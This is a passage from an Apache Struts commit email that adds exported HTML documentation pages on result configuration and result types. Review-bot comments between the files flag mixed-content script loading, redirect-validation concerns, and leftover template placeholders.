
From lukaszlen...@apache.org
Subject svn commit: r869821 [29/43] - in /websites/production/struts/content/development/2.x/docs: ./ ajax-validation.data/ big-picture.data/ chaining-interceptor.data/ colophon.data/ config-browser-plugin.data/ create-struts-2-web-application-using-maven-to-m...
Date Wed, 17 Jul 2013 09:31:13 GMT
Added: websites/production/struts/content/development/2.x/docs/result-configuration.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/result-configuration.html (added)
+++ websites/production/struts/content/development/2.x/docs/result-configuration.html Wed Jul 17 09:31:08 2013
@@ -0,0 +1,286 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+<html>
+<head>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <style type="text/css">
+        .dp-highlighter {
+            width:95% !important;
+        }
+    </style>
+    <style type="text/css">
+        .footer {
+            background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+            background-repeat:     repeat-x;
+            background-position:   left top;
+            padding-top:           4px;
+            color:                 #666;
+        }
+    </style>
+    <link href='http://struts.apache.org/highlighter/style/shCoreStruts.css' rel='stylesheet' type='text/css' />
+    <link href='http://struts.apache.org/highlighter/style/shThemeStruts.css' rel='stylesheet' type='text/css' />
+    <script src='http://struts.apache.org/highlighter/js/shCore.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushJava.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushXml.js' type='text/javascript'></script>
+    
+    <script type="text/javascript">
+        SyntaxHighlighter.defaults['toolbar'] = false;
+        SyntaxHighlighter.all();
+    </script>
+    <script type="text/javascript" language="javascript">
+        var hide = null;
+        var show = null;
+        var children = null;
+
+        function init() {
+            /* Search form initialization */
+            var form = document.forms['search'];
+            if (form != null) {
+                form.elements['domains'].value = location.hostname;
+                form.elements['sitesearch'].value = location.hostname;
+            }
+
+            /* Children initialization */
+            hide = document.getElementById('hide');
+            show = document.getElementById('show');
+            children = document.all != null ?
+                    document.all['children'] :
+                    document.getElementById('children');
+            if (children != null) {
+                children.style.display = 'none';
+                show.style.display = 'inline';
+                hide.style.display = 'none';
+            }
+        }
+
+        function showChildren() {
+            children.style.display = 'block';
+            show.style.display = 'none';
+            hide.style.display = 'inline';
+        }
+
+        function hideChildren() {
+            children.style.display = 'none';
+            show.style.display = 'inline';
+            hide.style.display = 'none';
+        }
+    </script>
+    <title>Result Configuration</title>
+</head>
+<body onload="init()">
+<table border="0" cellpadding="2" cellspacing="0" width="100%">
+    <tr class="topBar">
+        <td align="left" valign="middle" class="topBarDiv" align="left" nowrap>
+            &nbsp;<a href="home.html">Home</a>&nbsp;&gt;&nbsp;<a href="guides.html">Guides</a>&nbsp;&gt;&nbsp;<a href="core-developers-guide.html">Core Developers Guide</a>&nbsp;&gt;&nbsp;<a href="configuration-elements.html">Configuration Elements</a>&nbsp;&gt;&nbsp;<a href="result-configuration.html">Result Configuration</a>
+        </td>
+        <td align="right" valign="middle" nowrap>
+            <form name="search" action="http://www.google.com/search" method="get">
+                <input type="hidden" name="ie" value="UTF-8" />
+                <input type="hidden" name="oe" value="UTF-8" />
+                <input type="hidden" name="domains" value="" />
+                <input type="hidden" name="sitesearch" value="" />
+                <input type="text" name="q" maxlength="255" value="" />
+                <input type="submit" name="btnG" value="Google Search" />
+            </form>
+        </td>
+    </tr>
+</table>
+
+<div id="PageContent">
+    <div class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <div style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</div>
+        <div style="margin: 0px 10px 8px 10px"  class="pagetitle">Result Configuration</div>
+
+        <div class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=14118">
+                <img src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Edit Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=14118">Edit Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+                <img src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Browse Space"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=14118">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=14118">Add Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=14118">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add News"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=14118">Add News</a>
+        </div>
+    </div>
+
+    <div class="pagecontent">
+        <div class="wiki-content">
+            <div id="ConfluenceContent"><p>When an <a shape="rect" href="action.html" title="action">action</a> class method completes, it returns a String. The value of the String is used to select a result element. An action mapping will often have a set of results representing different possible outcomes. A standard set of result tokens are defined by the <tt>ActionSupport</tt> base class.</p>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeHeader panelHeader" style="border-bottom-width: 1px;"><b>Predefined result names</b></div><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[
+String SUCCESS = "success";
+String NONE    = "none";
+String ERROR   = "error";
+String INPUT   = "input";
+String LOGIN   = "login";
+]]></script>
+</div></div>
+
+<p>Of course, applications can define other result tokens to match specific cases.</p>
+
+<p><img align="middle" class="emoticon" src="https://cwiki.apache.org/confluence/images/icons/emoticons/information.gif" height="16" width="16" alt="" border="0"> Returning <tt><a shape="rect" class="external-link" href="http://struts.apache.org/2.x/struts2-core/apidocs/com/opensymphony/xwork2/Action.html#NONE">ActionSupport.NONE</a></tt> (or <tt>null</tt>) from an <a shape="rect" href="action.html" title="action">action</a> class method causes the results processing to be skipped. This is useful if the action fully handles the result processing such as writing directly to the HttpServletResponse OutputStream.</p>
+
+<h2><a shape="rect" name="ResultConfiguration-ResultElements"></a>Result Elements</h2>
+
+<p>The result element has two jobs. First, it provides a logical name. An <tt>Action</tt> can pass back a token like "success" or "error" without knowing any other implementation details. Second, the result element provides a result type. Most results simply forward to a server page or template, but other <a shape="rect" href="result-types.html" title="Result Types">Result Types</a> can be used to do more interesting things.</p>
+
+<h3><a shape="rect" name="ResultConfiguration-IntelligentDefaults"></a>Intelligent Defaults</h3>
+
+<p>Each package may set a default result type to be used if none is specified in a result element. If one package extends another, the "child" package can set its own default result, or inherit one from the parent.</p>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeHeader panelHeader" style="border-bottom-width: 1px;"><b>Setting a default Result Type</b></div><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;result-types&gt;
+   &lt;result-type name="dispatcher" default="true"
+                class="org.apache.struts2.dispatcher.ServletDispatcherResult" /&gt;
+&lt;/result-types&gt;
+]]></script>
+</div></div>
+
+<p>If a <tt>type</tt> attribute is not specified, the framework will use the default <tt>dispatcher</tt> type, which forwards to another web resource. If the resource is a JavaServer Page, then the container will render it, using its JSP engine.</p>
+
+<p>Likewise if the <tt>name</tt> attribute is not specified, the framework will give it the name "success".</p>
+
+<p>Using these intelligent defaults, the most often used result types also become the simplest.</p>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeHeader panelHeader" style="border-bottom-width: 1px;"><b>Result element without defaults</b></div><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;result name="success" type="dispatcher"&gt;
+    &lt;param name="location"&gt;/ThankYou.jsp&lt;/param&gt;
+&lt;/result&gt;
+]]></script>
+</div></div>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeHeader panelHeader" style="border-bottom-width: 1px;"><b>A Result element using some defaults</b></div><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;result&gt;
+    &lt;param name="location"&gt;/ThankYou.jsp&lt;/param&gt;
+&lt;/result&gt;
+]]></script>
+</div></div>
+
+<p>The <tt>param</tt> tag sets a property on the Result object. The most commonly-set property is <tt>location</tt>, which usually specifies the path to a web resources. The <tt>param</tt> attribute is another intelligent default.</p>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeHeader panelHeader" style="border-bottom-width: 1px;"><b>Result element using more defaults</b></div><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;result&gt;/ThankYou.jsp&lt;/result&gt;
+]]></script>
+</div></div>
+
+<p>Mixing results with intelligent defaults with other results makes it easier to see the "critical path".</p>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeHeader panelHeader" style="border-bottom-width: 1px;"><b>Multiple Results</b></div><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;action name="Hello"&gt;
+    &lt;result&gt;/hello/Result.jsp&lt;/result&gt;
+    &lt;result name="error"&gt;/hello/Error.jsp&lt;/result&gt;
+    &lt;result name="input"&gt;/hello/Input.jsp&lt;/result&gt;
+&lt;/action&gt;
+]]></script>
+</div></div>
+
+<p>A special 'other' result can be configured by adding a result with name="*".  This result will only be selected if no result is found with a matching name.</p>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeHeader panelHeader" style="border-bottom-width: 1px;"><b>'*' Other Result</b></div><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;action name="Hello"&gt;
+    &lt;result&gt;/hello/Result.jsp&lt;/result&gt;
+    &lt;result name="error"&gt;/hello/Error.jsp&lt;/result&gt;
+    &lt;result name="input"&gt;/hello/Input.jsp&lt;/result&gt;
+    &lt;result name="*"&gt;/hello/Other.jsp&lt;/result&gt;
+&lt;/action&gt;
+]]></script>
+</div></div>
+
+<p><img align="middle" class="emoticon" src="https://cwiki.apache.org/confluence/images/icons/emoticons/information.gif" height="16" width="16" alt="" border="0"> The name="*" is <b>not</b> a wildcard pattern, it is a special name that is only selected if an exact match is not found.</p>
+
+<p><img align="middle" class="emoticon" src="https://cwiki.apache.org/confluence/images/icons/emoticons/warning.gif" height="16" width="16" alt="" border="0"> In most cases if an action returns an unrecognized result name this would be a programming error and should be fixed.</p>
+
+<h2><a shape="rect" name="ResultConfiguration-GlobalResults"></a>Global Results</h2>
+
+<p>Most often, results are nested with the action element. But some results apply to multiple actions. In a secure application, a client might try to access a page without being authorized, and many actions may need access to a "logon" result.</p>
+
+<p>If actions need to share results, a set of global results can be defined for each package. The framework will first look for a local result nested in the action. If a local match is not found, then the global results are checked.</p>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeHeader panelHeader" style="border-bottom-width: 1px;"><b>Defining global results</b></div><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;global-results&gt;
+    &lt;result name="error"&gt;/Error.jsp&lt;/result&gt;
+    &lt;result name="invalid.token"&gt;/Error.jsp&lt;/result&gt;
+    &lt;result name="login" type="redirectAction"&gt;Logon!input&lt;/result&gt;
+&lt;/global-results&gt;
+]]></script>
+</div></div>
+
+<p><img align="middle" class="emoticon" src="https://cwiki.apache.org/confluence/images/icons/emoticons/lightbulb_on.gif" height="16" width="16" alt="" border="0"> For more about results, see <a shape="rect" href="result-types.html" title="Result Types">Result Types</a>.</p>
+
+<h2><a shape="rect" name="ResultConfiguration-DynamicResults"></a>Dynamic Results</h2>
+
+<p>A result may not be known until execution time. Consider the implementation of a state-machine-based execution flow; the next state might depend on any combination of form input elements, session attributes, user roles, moon phase, etc. In other words, determining the next action, input page, etc. may not be known at configuration time.</p>
+
+<p>Result values may be retrieved from its corresponding Action implementation by using EL expressions that access the Action's properties, just like the Struts 2 tag libraries. So given the following Action fragment:</p>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeHeader panelHeader" style="border-bottom-width: 1px;"><b>FragmentAction implementation</b></div><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[
+private String nextAction;
+
+public String getNextAction() {
+    return nextAction;
+}
+]]></script>
+</div></div>
+
+<p>you might define a result like this:</p>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeHeader panelHeader" style="border-bottom-width: 1px;"><b>FragmentAction configuration</b></div><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;action name="fragment" class="FragmentAction"&gt;
+    &lt;result name="next" type="redirectAction"&gt;${nextAction}&lt;/result&gt;
+&lt;/action&gt;
+]]></script>
+</div></div>
+
+<p>If a <tt>FragmentAction</tt> method returns "next" the actual <em>value</em> of that result will be whatever is in <tt>FragmentAction</tt>'s <tt>nextAction</tt> property. So <tt>nextAction</tt> may be computed based on whatever state information necessary then passed at runtime to "next"'s <tt>redirectAction</tt>.</p>
+
+<p>See <a shape="rect" href="parameters-in-configuration-results.html" title="Parameters in configuration results">Parameters in configuration results</a> for an expanded discussion.</p></div>
+        </div>
+
+        
+    </div>
+</div>
+<div class="footer">
+    Generated by CXF SiteExporter
+</div>
+</body>
+</html>
\ No newline at end of file
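Review bot: The highlighter stylesheets and scripts at L50–L54 are pulled over plain `http://struts.apache.org/...` while the site stylesheet at L35 already uses `https://`; when this page is served over HTTPS the script tags are blocked as mixed content, and when served over HTTP they are executable code fetched in the clear. The `href`/`src` values should be switched to `https://struts.apache.org/highlighter/...` (or made root-relative, e.g. `src='/highlighter/js/shCore.js'`, since the page lives on the same host). Separately, the Dynamic Results section at L263–L287 shows `${nextAction}` being evaluated inside a `redirectAction` result and suggests the property may be derived from "form input elements"; a sentence should be added after L287 noting that a property used this way must be set only from values the action has validated against a known set of action names, since a request-controlled value decides where the client is sent. The search form at L107 also submits to `http://www.google.com/search`; `https://` is preferable there too.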

Added: websites/production/struts/content/development/2.x/docs/result-types.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/result-types.html (added)
+++ websites/production/struts/content/development/2.x/docs/result-types.html Wed Jul 17 09:31:08 2013
@@ -0,0 +1,227 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+<html>
+<head>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <style type="text/css">
+        .dp-highlighter {
+            width:95% !important;
+        }
+    </style>
+    <style type="text/css">
+        .footer {
+            background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+            background-repeat:     repeat-x;
+            background-position:   left top;
+            padding-top:           4px;
+            color:                 #666;
+        }
+    </style>
+    <link href='http://struts.apache.org/highlighter/style/shCoreStruts.css' rel='stylesheet' type='text/css' />
+    <link href='http://struts.apache.org/highlighter/style/shThemeStruts.css' rel='stylesheet' type='text/css' />
+    <script src='http://struts.apache.org/highlighter/js/shCore.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushJava.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushXml.js' type='text/javascript'></script>
+    
+    <script type="text/javascript">
+        SyntaxHighlighter.defaults['toolbar'] = false;
+        SyntaxHighlighter.all();
+    </script>
+    <script type="text/javascript" language="javascript">
+        var hide = null;
+        var show = null;
+        var children = null;
+
+        function init() {
+            /* Search form initialization */
+            var form = document.forms['search'];
+            if (form != null) {
+                form.elements['domains'].value = location.hostname;
+                form.elements['sitesearch'].value = location.hostname;
+            }
+
+            /* Children initialization */
+            hide = document.getElementById('hide');
+            show = document.getElementById('show');
+            children = document.all != null ?
+                    document.all['children'] :
+                    document.getElementById('children');
+            if (children != null) {
+                children.style.display = 'none';
+                show.style.display = 'inline';
+                hide.style.display = 'none';
+            }
+        }
+
+        function showChildren() {
+            children.style.display = 'block';
+            show.style.display = 'none';
+            hide.style.display = 'inline';
+        }
+
+        function hideChildren() {
+            children.style.display = 'none';
+            show.style.display = 'inline';
+            hide.style.display = 'none';
+        }
+    </script>
+    <title>Result Types</title>
+</head>
+<body onload="init()">
+<table border="0" cellpadding="2" cellspacing="0" width="100%">
+    <tr class="topBar">
+        <td align="left" valign="middle" class="topBarDiv" align="left" nowrap>
+            &nbsp;<a href="home.html">Home</a>&nbsp;&gt;&nbsp;<a href="guides.html">Guides</a>&nbsp;&gt;&nbsp;<a href="core-developers-guide.html">Core Developers Guide</a>&nbsp;&gt;&nbsp;<a href="result-types.html">Result Types</a>
+        </td>
+        <td align="right" valign="middle" nowrap>
+            <form name="search" action="http://www.google.com/search" method="get">
+                <input type="hidden" name="ie" value="UTF-8" />
+                <input type="hidden" name="oe" value="UTF-8" />
+                <input type="hidden" name="domains" value="" />
+                <input type="hidden" name="sitesearch" value="" />
+                <input type="text" name="q" maxlength="255" value="" />
+                <input type="submit" name="btnG" value="Google Search" />
+            </form>
+        </td>
+    </tr>
+</table>
+
+<div id="PageContent">
+    <div class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <div style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</div>
+        <div style="margin: 0px 10px 8px 10px"  class="pagetitle">Result Types</div>
+
+        <div class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=14035">
+                <img src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Edit Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=14035">Edit Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+                <img src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Browse Space"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=14035">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=14035">Add Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=14035">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add News"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=14035">Add News</a>
+        </div>
+    </div>
+
+    <div class="pagecontent">
+        <div class="wiki-content">
+            <div id="ConfluenceContent"><p>Most use cases can be divided into two phases. First, we need to change or query the application's state, and then we need to present an updated view of the application. The Action class manages the application's state, and the Result Type manages the view.</p>
+
+<h2><a shape="rect" name="ResultTypes-PredefinedResultTypes"></a>Predefined Result Types</h2>
+
+<p>The framework provides several implementations of the <tt>com.opensymphony.xwork2.Result</tt> interface, ready to use in your own applications.</p>
+<div class="table-wrap">
+<table class="confluenceTable"><tbody><tr><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" href="chain-result.html" title="Chain Result">Chain Result</a> </td><td colspan="1" rowspan="1" class="confluenceTd"> Used for <a shape="rect" href="action-chaining.html" title="Action Chaining">Action Chaining</a> </td></tr><tr><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" href="dispatcher-result.html" title="Dispatcher Result">Dispatcher Result</a> </td><td colspan="1" rowspan="1" class="confluenceTd"> Used for web resource integration, including <a shape="rect" href="jsp.html" title="JSP">JSP</a> integration </td></tr><tr><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" href="freemarker-result.html" title="FreeMarker Result">FreeMarker Result</a> </td><td colspan="1" rowspan="1" class="confluenceTd"> Used for <a shape="rect" href="freemarker.html" title="FreeMarker">FreeMarker</a> integration </td></tr><tr><td colspan="1" rowspan="1" cla
 ss="confluenceTd"> <a shape="rect" href="httpheader-result.html" title="HttpHeader Result">HttpHeader Result</a> </td><td colspan="1" rowspan="1" class="confluenceTd"> Used to control special HTTP behaviors </td></tr><tr><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" href="redirect-result.html" title="Redirect Result">Redirect Result</a> </td><td colspan="1" rowspan="1" class="confluenceTd"> Used to redirect to another URL (web resource) </td></tr><tr><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" href="redirect-action-result.html" title="Redirect Action Result">Redirect Action Result</a> </td><td colspan="1" rowspan="1" class="confluenceTd"> Used to redirect to another action mapping </td></tr><tr><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" href="stream-result.html" title="Stream Result">Stream Result</a> </td><td colspan="1" rowspan="1" class="confluenceTd"> Used to stream an InputStream back to the browser (usually for f
 ile downloads) </td></tr><tr><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" href="velocity-result.html" title="Velocity Result">Velocity Result</a> </td><td colspan="1" rowspan="1" class="confluenceTd"> Used for <a shape="rect" href="velocity.html" title="Velocity">Velocity</a> integration </td></tr><tr><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" href="xsl-result.html" title="XSL Result">XSL Result</a> </td><td colspan="1" rowspan="1" class="confluenceTd"> Used for XML/XSLT integration </td></tr><tr><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" href="plaintext-result.html" title="PlainText Result">PlainText Result</a> </td><td colspan="1" rowspan="1" class="confluenceTd"> Used to display the raw content of a particular page (i.e jsp, HTML) </td></tr><tr><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" href="tiles-plugin.html" title="Tiles Plugin">Tiles Result</a> </td><td colspan="1" rowspan="1" class="con
 fluenceTd"> Used to provide Tiles integration </td></tr></tbody></table>
+</div>
+
+
+<h3><a shape="rect" name="ResultTypes-Optional"></a>Optional</h3>
+
+<div class="table-wrap">
+<table class="confluenceTable"><tbody><tr><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" href="jasperreports-plugin.html" title="JasperReports Plugin">JasperReports Plugin</a> </td><td colspan="1" rowspan="1" class="confluenceTd"> Used for <a shape="rect" href="jasperreports-tutorial.html" title="JasperReports Tutorial">JasperReports Tutorial</a> integration </td><td colspan="1" rowspan="1" class="confluenceTd"> Optional, third-party plugin </td></tr></tbody></table>
+</div>
+
+<p>Additional Result Types can be created and plugged into an application by implementing the <tt>com.opensymphony.xwork2.Result</tt> interface. Custom Result Types might include generating an email or JMS message, generating images, and so forth.</p>
+
+<h2><a shape="rect" name="ResultTypes-DefaultParameters"></a>Default Parameters</h2>
+
+<p>To minimize configuration, Results can be configured with a single value, which will be converted into a parameter, and each Result can specify which parameter this value should be set as.  For example, here is a result defined in XML that uses a default parameter:</p>
+<div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;result type="freemarker"&gt;foo.fm&lt;/result&gt;
+]]></script>
+</div></div>
+<p>That is the equivalent to this:</p>
+<div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;result type="freemarker"&gt;
+  &lt;param name="location"&gt;foo.vm&lt;/param&gt;
+&lt;/result&gt;
+]]></script>
+</div></div>
+<p>Since probably 95% of your actions won't need results that contain multiple parameters, this little shortcut saves you a significant amount of configuration.  It also follows that if you have specified the default parameter, you don't need to set the same parameter as a specifically-named parameter.</p>
+
+<h2><a shape="rect" name="ResultTypes-RegisteringResultTypes"></a>Registering Result Types</h2>
+
+<p>All Result Types are plugged in via the <a shape="rect" href="result-configuration.html" title="Result Configuration">Result Configuration</a>.</p>
+
+<h2><a shape="rect" name="ResultTypes-Next%3ADispatcherListener"></a>Next: <a shape="rect" href="dispatcherlistener.html" title="DispatcherListener">DispatcherListener</a></h2></div>
+        </div>
+
+                    <div class="tabletitle">
+                Children
+            <span class="smalltext" id="show" style="display: inline;">
+              <a href="javascript:showChildren()">Show Children</a></span>
+            <span class="smalltext" id="hide" style="display: none;">
+              <a href="javascript:hideChildren()">Hide Children</a></span>
+            </div>
+            <div class="greybox" id="children" style="display: none;">
+                                                    $page.link($child)
+                    <span class="smalltext">(Apache Struts 2 Documentation)</span>
+                    <br>
+                                    $page.link($child)
+                    <span class="smalltext">(Apache Struts 2 Documentation)</span>
+                    <br>
+                                    $page.link($child)
+                    <span class="smalltext">(Apache Struts 2 Documentation)</span>
+                    <br>
+                                    $page.link($child)
+                    <span class="smalltext">(Apache Struts 2 Documentation)</span>
+                    <br>
+                                    $page.link($child)
+                    <span class="smalltext">(Apache Struts 2 Documentation)</span>
+                    <br>
+                                    $page.link($child)
+                    <span class="smalltext">(Apache Struts 2 Documentation)</span>
+                    <br>
+                                    $page.link($child)
+                    <span class="smalltext">(Apache Struts 2 Documentation)</span>
+                    <br>
+                                    $page.link($child)
+                    <span class="smalltext">(Apache Struts 2 Documentation)</span>
+                    <br>
+                                    $page.link($child)
+                    <span class="smalltext">(Apache Struts 2 Documentation)</span>
+                    <br>
+                                    $page.link($child)
+                    <span class="smalltext">(Apache Struts 2 Documentation)</span>
+                    <br>
+                            </div>
+        
+    </div>
+</div>
+<div class="footer">
+    Generated by CXF SiteExporter
+</div>
+</body>
+</html>
\ No newline at end of file
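Review bot: The "Children" box at L497–L528 contains ten literal `$page.link($child)` tokens, so the exporter's Velocity template was emitted unrendered and the published page shows raw placeholders instead of child-page links; the section should either be regenerated with the child list resolved or dropped until it is. As in the sibling page, the highlighter assets at L343–L347 are loaded over `http://` while L328 uses `https://`, which is mixed content on an HTTPS site and plaintext-fetched script otherwise; change them to `https://struts.apache.org/highlighter/...` or a root-relative path. The second example at L477 uses `foo.vm` where the shorthand form at L470 uses `foo.fm`, so the two snippets the text calls "equivalent" do not match; one of the two filenames should be corrected.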

Added: websites/production/struts/content/development/2.x/docs/roles-interceptor.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/roles-interceptor.html (added)
+++ websites/production/struts/content/development/2.x/docs/roles-interceptor.html Wed Jul 17 09:31:08 2013
@@ -0,0 +1,148 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+<html>
+<head>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <style type="text/css">
+        .dp-highlighter {
+            width:95% !important;
+        }
+    </style>
+    <style type="text/css">
+        .footer {
+            background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+            background-repeat:     repeat-x;
+            background-position:   left top;
+            padding-top:           4px;
+            color:                 #666;
+        }
+    </style>
+    <link href='http://struts.apache.org/highlighter/style/shCoreStruts.css' rel='stylesheet' type='text/css' />
+    <link href='http://struts.apache.org/highlighter/style/shThemeStruts.css' rel='stylesheet' type='text/css' />
+    <script src='http://struts.apache.org/highlighter/js/shCore.js' type='text/javascript'></script>
